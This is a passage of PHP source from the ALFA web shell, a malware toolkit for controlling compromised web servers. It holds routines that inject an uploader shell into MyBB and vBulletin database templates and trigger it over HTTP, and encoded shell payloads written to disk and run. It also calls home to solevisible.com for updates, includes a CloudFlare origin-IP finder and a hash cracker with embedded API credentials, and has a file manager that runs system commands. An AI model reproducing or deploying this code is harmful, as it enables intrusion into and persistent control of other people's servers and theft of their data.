\n\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')\n);\ncreate_table($table);\necho $selector;\necho \"
\";\nif(isset($_POST['alfa6'])) {\n$dbu = $_POST['alfa6'];\n$dbn = $_POST['alfa7'];\n$dbp = $_POST['alfa8'];\n$dbh = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$method = $_POST['alfa4'];\n$shellCode = \"{\\${\".ALFA_UPLOADER.\"}}\";\n$newinshell = str_replace(\"'\",\"\\'\",$shellCode);\nif (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\n$inject = \"select template from {$prefix}templates where  title= 'calendar'\";\n$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));\n$GetTemp = mysqli_fetch_assoc($result);\n$saveDate = $GetTemp['template'];\n$repsave = str_replace($shellCode,\"\",$saveDate);\n$repsave = str_replace(\"'\",\"\\'\",$repsave);\n$createShell = \"update {$prefix}templates SET template= '\".$newinshell.$repsave.\"' where title = 'calendar'\";\n$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));\n$geturl = \"select value from {$prefix}settings where name= 'bburl'\";\n$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));\n$rowb = mysqli_fetch_assoc($findurl);\n$furl = $rowb['value'];\n$realurl = parse_url($furl,PHP_URL_HOST);\n$realpath = parse_url($furl,PHP_URL_PATH);\n$res = false;\n$AlfaCurl = new AlfaCURL();\nif (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){\nif ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\n@fputs($fsock, \"GET $realpath/calendar.php HTTP/1.1\\r\\n\");\n@fputs($fsock, \"HOST: $realurl\\r\\n\");\n@fputs($fsock, \"Connection: close\\r\\n\\r\\n\");\n$check = fgets($fsock);\nif(preg_match(\"/200 OK/i\",$check)){\n$repairdbtemp = \"update {$prefix}templates SET template= '$repsave' where title = 'calendar'\";\n$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}\n@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){\n$AlfaCurl->Send($realurl.$realpath.\"/calendar.php\");\n$res = true;\n}\nif($res){\n$ff = 'http://'.$realurl.$realpath.\"/solevisible.php\";\noutput($ff);\n}else{\n$ff = 'http://'.$realurl.$realpath.\"/calendar.php\";\n$fff = 'http://'.$realurl.$realpath.\"/solevisible.php\";\necho \"

Please Go To Target => \".$ff.\"
And Go To => \".$fff.\"


\";\n}}}}\nif(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){\nAlfaNum(1,2,7,9,10);\necho __pre().'
| vbulletin |
'.getConfigHtml('vb').'
';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho $selector;\necho '
';\nif(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){\n$method = $_POST['alfa8'];\n$faq_name = \"faq\";\n$faq_file = \"/faq.php\";\n$code = \"{\\${\".ALFA_UPLOADER.\"}}{\\${exit()}}&\";\n$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());\n$rec = \"select `template` from \".$_POST['alfa6'].\"template WHERE title ='\".$faq_name.\"'\";\n$recivedata = @mysqli_query($conn,$rec);\n$getd = @mysqli_fetch_assoc($recivedata);\n$savetoass = $getd['template'];\nif(empty($savetoass)){\n\t$faq_name = \"header\";\n\t$faq_file = \"/\";\n\t$rec = \"select `template` from \".$_POST['alfa6'].\"template WHERE title ='\".$faq_name.\"'\";\n\t$recivedata = @mysqli_query($conn,$rec);\n\t$getd = @mysqli_fetch_assoc($recivedata);\n\t$savetoass = $getd['template'];\n\t$code = ALFA_UPLOADER.\";\";\n}\n$code = str_replace(\"'\",\"\\'\",$code);\n$p = \"UPDATE \".$_POST['alfa6'].\"template SET `template`='\".$code.\"' WHERE `title`='\".$faq_name.\"'\";\n$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));\n$geturl = @mysqli_query($conn,\"select `value` from \".$_POST['alfa6'].\"setting WHERE `varname`='bburl'\");\n$getval = @mysqli_fetch_assoc($geturl);\n$saveval = $getval['value'];\nif($faq_name == \"header\"){\n\tif(substr($saveval, -5, 5) == \"/core\"){\n\t\t$saveval = substr($saveval, 0, -5);\n\t}\n}\n$realurl = parse_url($saveval,PHP_URL_HOST);\n$realpath = parse_url($saveval,PHP_URL_PATH);\n$res = false;\n$AlfaCurl = new AlfaCURL();\nif(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){\nif($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\n@fputs($fsock, \"GET $realpath.$faq_file HTTP/1.1\\r\\n\");\n@fputs($fsock, \"HOST: $realurl\\r\\n\");\n@fputs($fsock, \"Connection: close\\r\\n\\r\\n\");\n$check = fgets($fsock);\nif(preg_match(\"/200 OK/i\",$check)){\n$p1 = \"UPDATE \".$_POST['alfa6'].\"template SET template ='\".mysqli_real_escape_string($conn,$savetoass).\"' WHERE title ='\".$faq_name.\"'\";\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\n$res = true;\n}\n@fclose($fsock);\n}\n}elseif(function_exists('curl_version') && $method == 'auto'){\n$AlfaCurl->Send($realurl.$realpath.$faq_file);\n$p1 = \"UPDATE \".$_POST['alfa6'].\"template SET template ='\".mysqli_real_escape_string($conn,$savetoass).\"' WHERE title ='\".$faq_name.\"'\";\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\n$res = true;\n}\nif($res){\n$ff = 'http://'.$realurl.$realpath.\"/solevisible.php\";\noutput($ff);\n}else{\n$ff = 'http://'.$realurl.$realpath.$faq_file;\n$fff = 'http://'.$realurl.$realpath.\"/solevisible.php\";\necho \"
First Open This Link => \".$ff.\"
Second Open This Link => \".$fff.\"
\";}}}\necho '
';\nalfafooter();\n}\nfunction alfacheckfiletype(){\n\t$path = $_POST['path'];\n\t$arg = $_POST['arg'];\n\tif(@is_file($path.'/'.$arg)){\n\t\techo(\"file\");\n\t}else{\n\t\techo(\"dir\");\n\t}\n}\nfunction alfacheckupdate(){\n\tif($GLOBALS[\"DB_NAME\"][\"cgi_api\"]){\n\t\tif(!isset($_COOKIE[\"alfacgiapi_mode\"])&&!isset($_COOKIE[\"alfacgiapi\"])){\n\t\t\t_alfa_cgicmd(\"whoami\",\"perl\",true);\n\t\t\tif(strlen(alfaEx(\"whoami\",false,true))>0){\n\t\t\t\t__alfa_set_cookie(\"alfa_canruncmd\", \"true\");\n\t\t\t}\n\t\t}\n\t}\n\tif(function_exists(\"curl_version\")){\n\t\t$update = new AlfaCURL();\n\t\t$json = $update->Send(\"http://solevisible.com/update.json?ver=\".__ALFA_VERSION__);\n\t\t$json = @json_decode($json,true);\n\t\t$data = array();\n\t\tif($json){\n\t\t\tif(!isset($_COOKIE['alfa_checkupdate']) && !empty($json[\"type\"])){\n\t\t\t\tif($json[\"type\"] == \"update\"){\n\t\t\t\t\tif(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){\n\t\t\t\t\t\t@setcookie(\"alfa_checkupdate\", \"1\", time()+86400);\n\t\t\t\t\t\t$data[\"content\"] = '
'.$json[\"content\"].'
';\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif(isset($json[\"ads\"]) && !empty($json[\"ads\"])){\n\t\t\t\t$data[\"content\"] .= $json[\"ads\"];\n\t\t\t}\n\t\t\tif(isset($json[\"copyright\"]) && !empty($json[\"copyright\"])){\n\t\t\t\t$data[\"copyright\"] = $json[\"copyright\"];\n\t\t\t}\n\t\t\tif(isset($json[\"solevisible\"]) && !empty($json[\"solevisible\"])){\n\t\t\t\t$data[\"solevisible\"] = $json[\"solevisible\"];\n\t\t\t}\n\t\t\tif(isset($json[\"code_name\"]) && !empty($json[\"code_name\"])){\n\t\t\t\t$data[\"code_name\"] = $json[\"code_name\"];\n\t\t\t\t$data[\"version_number\"] = __ALFA_VERSION__;\n\t\t\t}\n\t\t\tif(isset($json[\"market\"]) && !empty($json[\"market\"])){\n\t\t\t\t$data[\"market\"] = $json[\"market\"];\n\t\t\t}\n\t\t\techo @json_encode($data);\n\t\t}\n\t}\n}\nfunction alfaWriteTocgiapi($name, $source){\n\t$temp = \"\";\n\t$not_api = array(\"basedir.alfa\", \"getdir.alfa\", \"getheader.alfa\");\n\tif(in_array($name, $not_api)){\n\t\t$temp = ALFA_TEMPDIR;\n\t\tif($temp){\n\t\t\t@chdir($temp);\n\t\t}\n\t}else{\n\t\talfaCreateParentFolder();\n\t\t@chdir($GLOBALS['home_cwd'] . \"/\" . __ALFA_DATA_FOLDER__);\n\t}\n\t@mkdir('alfacgiapi',0755);\n\t__write_file(\"alfacgiapi/\".$name, __get_resource($source));\n\t@chmod(\"alfacgiapi/\".$name, 0755);\n\treturn $temp;\n}\nfunction alfacheckcgi(){if(strlen(alfaEx(\"id\",false,true,true))>0)echo(\"ok\");else echo(\"no\");}\nfunction alfaupdateheader(){\n\tif(!isset($_COOKIE[\"updateheader_data\"])){\n\t\t$bash = \"zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==\";\n\t\t$realdir = addslashes(dirname($_SERVER[\"SCRIPT_FILENAME\"]));\n\t\t$tmp_path = alfaWriteTocgiapi(\"getheader.alfa\",$bash);\n\t\t$data = alfaEx(\"cd '{$tmp_path}/alfacgiapi';sh getheader.alfa\",false,true,true);\n\t\tif(@is_array(@json_decode($data,true))){\n\t\t\t__alfa_set_cookie(\"updateheader_data\", __ZW5jb2Rlcg($data));\n\t\t\techo $data;\n\t\t}\n\t}else{\n\t\techo __ZGVjb2Rlcg($_COOKIE[\"updateheader_data\"]);\n\t}\n}\nfunction alfassiShell(){\nalfahead();\necho '
';\nalfaCreateParentFolder();\n@chdir($GLOBALS['home_cwd'] . \"/\" . __ALFA_DATA_FOLDER__);\n@mkdir('alfa_shtml',0755);\n@chdir('alfa_shtml');\nalfacgihtaccess('shtml');\n$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';\n@__write_file('alfa_ssi.shtml',__get_resource($code));\n@chmod(\"alfa_ssi.shtml\",0755);\necho AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');\necho '
';\nalfafooter();\n}\nfunction alfacloudflare(){\nalfahead();\nAlfaNum(8,9,10,7,6,5,4,3);\necho \"

| Cloud Flare ByPasser |

>'); return false;\\\" method='post'>\n
Target:
  
\";\nif($_POST['alfa2'] && $_POST['alfa2'] == '>>'){\n$url = $_POST['alfa1'];\nif(!preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url)){\n$url = preg_replace('/^(https?):\\/\\//', '', $url);\n$url = \"http://www.\".$url;\n}\n$headers = @get_headers($url, 1);\n$server = $headers['Server'];\n$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');\nif(preg_match('/^(https?):\\/\\/(w{3}|w3)\\./i', $url, $matches)){\nif($matches[2] != 'www'){$url = preg_replace('/^(https?):\\/\\//', '', $url);}else{\n$url = explode($matches[0], $url);\n$url = $url[1];}}\nif(is_array($server))$server = $server[0];\necho __pre();\nif(preg_match('/cloudflare/i', $server))\necho \"\\n[+] CloudFlare detected: {$server}\\n
\";\nelse\necho \"\\n[+] CloudFlare wasn't detected, proceeding anyway.\\n\";\necho '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . \"\\n\\n

\";\necho \"[+] Searching for more IP addresses.\\n\\n

\";\nfor($x=0;$x\";\n}\necho \"\\n[+] Finished.\\n
\";\n}\necho '
';\nalfafooter();\n}\nfunction is_ipv4($ip){\nreturn filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';\n}\nfunction __alert($s){\necho '
'.__pre().$s.'
';\n}\nfunction create_table($data){\necho '';\nforeach ($data as $key => $val){\n$array = array();\nforeach($val as $k => $v){\n$array[$k] = $v;\n}\necho \"\";\n}\necho '
\".$array['tdName'].\"
';\n}\nfunction alfaphp2xml(){\nalfahead();\nAlfaNum(8,9,10,7,6,5,4,3);\necho \"
| Shell For vBulletin |
>'); return false;\\\" method='post'>\n



\n
\";\nif($_POST['alfa2']&&$_POST['alfa2']=='>>'){\necho __pre().\"
';\n}\necho '
';\nalfafooter();\n}\nfunction alfacpcrack(){\nalfahead();\necho '
| Hash Tools |
| DeCrypter | | Hash Analyzer | 
';\nif($_POST['alfa1']=='dec'){\n$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');\necho '
| DeCrypter |


\n
>\\',this.alg.value); return false;\">
Decrypt Method:
  

';\nif($_POST['alfa3'] == '>>'){\n$hash = $_POST['alfa2'];\nif(!empty($hash)){\n$hash_type = $_POST['alfa4'];\n$email = \"[email protected]\";\n$code = \"7b9fa79f92c3cd96\";\n$target = \"https://md5decrypt.net/Api/api.php?hash=\".$hash.\"&hash_type=\".$hash_type.\"&email=\".$email.\"&code=\".$code;\n$resp = @file_get_contents($target);\nif($resp==''){\n$get = new AlfaCURL();\n$resp = $get->Send($target);\n}\necho __pre().'
';\nswitch($resp){\n\tcase('CODE ERREUR : 001'):echo \"You exceeded the 400 allowed request per day\";break;\n\tcase('CODE ERREUR : 003'):echo \"Your request includes more than 400 hashes.\";break;\n\tcase('CODE ERREUR : 004'):echo \"The type of hash you provide in the argument hash_type doesn't seem to be valid\";break;\n\tcase('CODE ERREUR : 005'):echo \"The hash you provide doesn't seem to match with the type of hash you set.\";break;\n}\nif(substr($resp,0,4)!='CODE'&&$resp!=''){\necho \"Result: \".$resp.\"\";\n}elseif(substr($resp,0,4)!='CODE'){\necho \"NoT Found
\";\n}\necho('
');\n}\n}\n}\nif($_POST['alfa1']=='analyzer'){\necho '
| Hash Analyzer |
\n
>\\');return false;\">\n
Hash: 
  

';\nif($_POST['alfa3'] == '>>'){\n$hash = $_POST['alfa2'];\nif(!empty($hash)){\n$curl = new AlfaCURL();\n$resp = $curl->Send(\"https://md5decrypt.net/en/HashFinder/\",\"post\",\"hash={$hash}&crypt=Search\");\necho(__pre().'
');\nif(preg_match('#
(.*?)
#',$resp,$s)){\n\techo(''.$s[1].'');\n}else{\n\techo('Not Found...!');\n}\necho('

');\n}\n}\n}\necho '
';\nalfafooter();\n}\nfunction alfafooter(){\nif(!isset($_POST['ajax'])){\necho \"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Make File : 
 
Make Dir : 
 
Delete : 
 
Chmod : 
 
Change Dir : 
 
Read File : 
 
Execute :

\n\n\n\n\n\nUpload file: 
\n
\n\n
\n\n
Sql Manager
\n\n
\n\n
\n
0
Database
\n
0
Options
\n
0
Editor
\n
0
Cgi Shell
\n\n
\n
\n\";?>\n\n\n\n= 1073741824)\nreturn sprintf('%1.2f', $s / 1073741824 ). ' GB';\nelseif($s >= 1048576)\nreturn sprintf('%1.2f', $s / 1048576 ) . ' MB';\nelseif($s >= 1024)\nreturn sprintf('%1.2f', $s / 1024 ) . ' KB';\nelse\nreturn $s . ' B';\n}\nfunction alfaPerms($p) {\nif (($p & 0xC000) == 0xC000)$i = 's​';\nelseif (($p & 0xA000) == 0xA000)$i = 'l​';\nelseif (($p & 0x8000) == 0x8000)$i = '-​';\nelseif (($p & 0x6000) == 0x6000)$i = 'b​';\nelseif (($p & 0x4000) == 0x4000)$i = 'd​';\nelseif (($p & 0x2000) == 0x2000)$i = 'c​';\nelseif (($p & 0x1000) == 0x1000)$i = 'p​';\nelse $i = 'u​';\n$i .= (($p & 0x0100) ? 'r​' : '-');\n$i .= (($p & 0x0080) ? 'w​' : '-');\n$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's​' : 'x​' ) : (($p & 0x0800) ? 'S​' : '-'));\n$i .= (($p & 0x0020) ? 'r​' : '-');\n$i .= (($p & 0x0010) ? 'w​' : '-');\n$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's​' : 'x​' ) : (($p & 0x0400) ? 'S​' : '-'));\n$i .= (($p & 0x0004) ? 'r​' : '-');\n$i .= (($p & 0x0002) ? 'w​' : '-');\n$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't​' : 'x​' ) : (($p & 0x0200) ? 'T​' : '-'));\nreturn $i;\n}\nfunction alfaPermsColor($f,$isbash=false){\n$class = \"\";\n$num = \"\";\n$human = \"\";\nif($isbash){\n$class = $f[\"class\"];\n$num = $f[\"num\"];\n$human = $f[\"human\"];\n}else{\n$num = substr(sprintf('%o', @fileperms($f)),-4);\n$human = alfaPerms(@fileperms($f));\nif(!@is_readable($f))\n$class = \"main_red_perm\";\nelseif (!@is_writable($f))\n$class = \"main_white_perm\";\nelse\n$class = \"main_green_perm\";\n}\nreturn ''.$num.' >> '.$human.'';\n}\nif(!function_exists(\"scandir\")) {\nfunction scandir($dir) {\n$dh = opendir($dir);\nwhile (false !== ($filename = readdir($dh)))\n$files[] = $filename;\nreturn $files;\n}\n}\nfunction reArrayFiles($file_post){\n$file_ary = array();\n$file_count = count($file_post['name']);\n$file_keys = array_keys($file_post);\nfor ($i=0; $i<$file_count; $i++) {\nforeach ($file_keys as $key) {\n$file_ary[$i][$key] = $file_post[$key][$i];\n}\n}\nreturn $file_ary;\n}\nfunction _alfa_can_runCommand($cgi=true,$cache=true){\n\tif(isset($_COOKIE[\"alfa_canruncmd\"])&&$cache){\n\t\treturn true;\n\t}\n\tif(strlen(alfaEx(\"whoami\",false,$cgi))>0){\n\t\t$_COOKIE[\"alfa_canruncmd\"] = true;\n\t\treturn true;\n\t}\n\treturn false;\n}\nfunction _alfa_symlink($target, $link){\n\t$phpsym = function_exists(\"symlink\");\n\tif($phpsym){\n\t\t@symlink($target, $link);\n\t}else{\n\t\talfaEx(\"ln -s '\".addslashes($target).\"' '\".addslashes($link).\"'\");\n\t}\n}\nfunction _alfa_file_exists($file,$cgi=true){\n\tif(@file_exists($file)){\n\t\treturn true;\n\t}else{\n\t\tif(strlen(alfaEx(\"ls -la '\".addslashes($file).\"'\",false,$cgi))>0){\n\t\t\treturn true;\n\t\t}\n\t}\n\treturn false;\n}\nfunction _alfa_file($file,$cgi=true){\n\t$array = @file($file);\n\tif(!$array){\n\t\tif(strlen(alfaEx(\"id\",false,$cgi))>0){\n\t\t\t$data = alfaEx('cat \"'.addslashes($file).'\"',false,$cgi);\n\t\t\tif(strlen($data)>0){\n\t\t\t\treturn explode(\"\\n\", $data);\n\t\t\t}else{\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}else{\n\t\t\treturn false;\n\t\t}\n\t}else{\n\t\treturn $array;\n\t}\n}\nfunction _alfa_is_writable($file){\n\t$check = false;\n\t$check = @is_writable($file);\n\tif(!$check){\n\t\tif(_alfa_can_runCommand()){\n\t\t\t$check = alfaEx('[ -w \"'.trim(addslashes($file)).'\" ] && echo \"yes\" || echo \"no\"');\n\t\t\tif($check == \"yes\"){\n\t\t\t\t$check = true;\n\t\t\t}else{\n\t\t\t\t$check = false;\n\t\t\t}\n\t\t}\n\t}\n\treturn $check;\n}\nfunction _alfa_is_dir($dir,$mode=\"-d\"){\n\t$check = false;\n\t$check = @is_dir($dir);\n\tif($mode == \"-e\"){\n\t\t$check = @is_file($dir);\n\t}\n\tif(!$check){\n\t\tif(_alfa_can_runCommand()){\n\t\t\t$check = alfaEx('[ \"'.trim($mode).'\" \"'.trim(addslashes($dir)).'\" ] && echo \"yes\" || echo \"no\"');\n\t\t\tif($check == \"yes\"){\n\t\t\t\treturn true;\n\t\t\t}else{\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t}\n\treturn $check;\n}\nfunction _alfa_load_ace_options($base){\n\treturn 'Theme: Language: Soft Wrap:  | Font Size:  |  | ';\n}\nfunction alfaFilesMan2(){\n\talfahead();\n\tAlfaNum(8,9,10,7,6,5,4);\n\techo '
';\n\talfaFooter();\n}\nfunction copy_paste($c,$s,$d){\nif(@is_dir($c.$s)){\n@mkdir($d.$s);\n$h = @opendir($c.$s);\nwhile (($f = @readdir($h)) !== false)\nif (($f != \".\") and ($f != \"..\"))\ncopy_paste($c.$s.'/',$f, $d.$s.'/');\n} elseif(is_file($c.$s))\n@copy($c.$s, $d.$s);\n}\nfunction alfaFilesMan(){\nif(!empty ($_COOKIE['alfa_f']))\n$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);\nif(!empty($_POST['alfa1'])){\nswitch($_POST['alfa1']){\ncase 'uploadFile':\n$move_cmd_file = false;\n$alfa_canruncmd = false;\nif($GLOBALS['glob_chdir_false']){\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\n\t$move_cmd_file = true;\n}\nif(_alfa_is_writable($GLOBALS['cwd'])){\n$files = reArrayFiles($_FILES['f']);\n$ret_files = array();\nforeach($files as $file){\nif($move_cmd_file&&$alfa_canruncmd){\n\talfaEx(\"cat '\".addslashes($file['tmp_name']).\"' > '\".addslashes($_POST[\"c\"].\"/\".$file['name']).\"'\");\n}else{\n\tif(@move_uploaded_file($file['tmp_name'],$file['name'])){\n\t\t$ow = function_exists(\"posix_getpwuid\")&&function_exists(\"fileowner\")?@posix_getpwuid(@fileowner($file['name'])):array(\"name\" => \"????\");\n\t\t$gr = function_exists(\"posix_getgrgid\")&&function_exists(\"filegroup\")?@posix_getgrgid(@filegroup($file['name'])):array(\"name\" => \"????\");\n\t\t$file_owner = $ow['name']?$ow['name']:(function_exists(\"fileowner\")?@fileowner($file['name']):\"????\");\n\t\t$file_group = $gr['name']?$gr['name']:(function_exists(\"filegroup\")?@filegroup($file['name']):\"????\");\n\t\t$file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));\n\t\t$file_perm = alfaPermsColor($file['name']);\n\t\t$file_size = @filesize($file['name']);\n\t\t$ret_files[] = array(\"name\" => $file['name'], \"size\" => alfaSize($file_size), \"perm\" => $file_perm, \"modify\" => $file_modify, \"owner\" => $file_owner.\"/\".$file_group);\n\t}\n}\n}\nif(!$move_cmd_file){\n\techo json_encode($ret_files);\n}\n}else{\n\techo \"noperm\";\n\treturn;\n}\nif(!$move_cmd_file){\nreturn;\n}\nbreak;\ncase 'mkdir':\n$new_dir_cmd = false;\nif($GLOBALS['glob_chdir_false']){\n\tif(_alfa_can_runCommand(true,true)){\n\t\tif(_alfa_is_writable($GLOBALS['cwd'])){\n\t\t\tif(!_alfa_is_dir(trim($_POST['alfa2']))){\n\t\t\t\talfaEx(\"cd '\".trim(addslashes($_POST['c'])).\"';mkdir '\".trim(addslashes($_POST['alfa2'])).\"'\");\n\t\t\t\techo \"\";\n\t\t\t}else{\n\t\t\t\techo \"\";\n\t\t\t}\n\t\t}else{\n\t\t\techo \"\";\n\t\t}\n\t}else{\n\t\techo \"\";\n\t}\n}else{\n\tif(_alfa_is_writable($GLOBALS['cwd'])){\n\t\tif(!_alfa_is_dir(trim($_POST['alfa2']))){\n\t\t\tif(!@mkdir(trim($_POST['alfa2']))){\n\t\t\t\techo \"\";\n\t\t\t}else{\n\t\t\t\techo \"\";\n\t\t\t}\n\t\t}else{\n\t\t\techo \"\";\n\t\t}\n\t}else{\n\t\techo 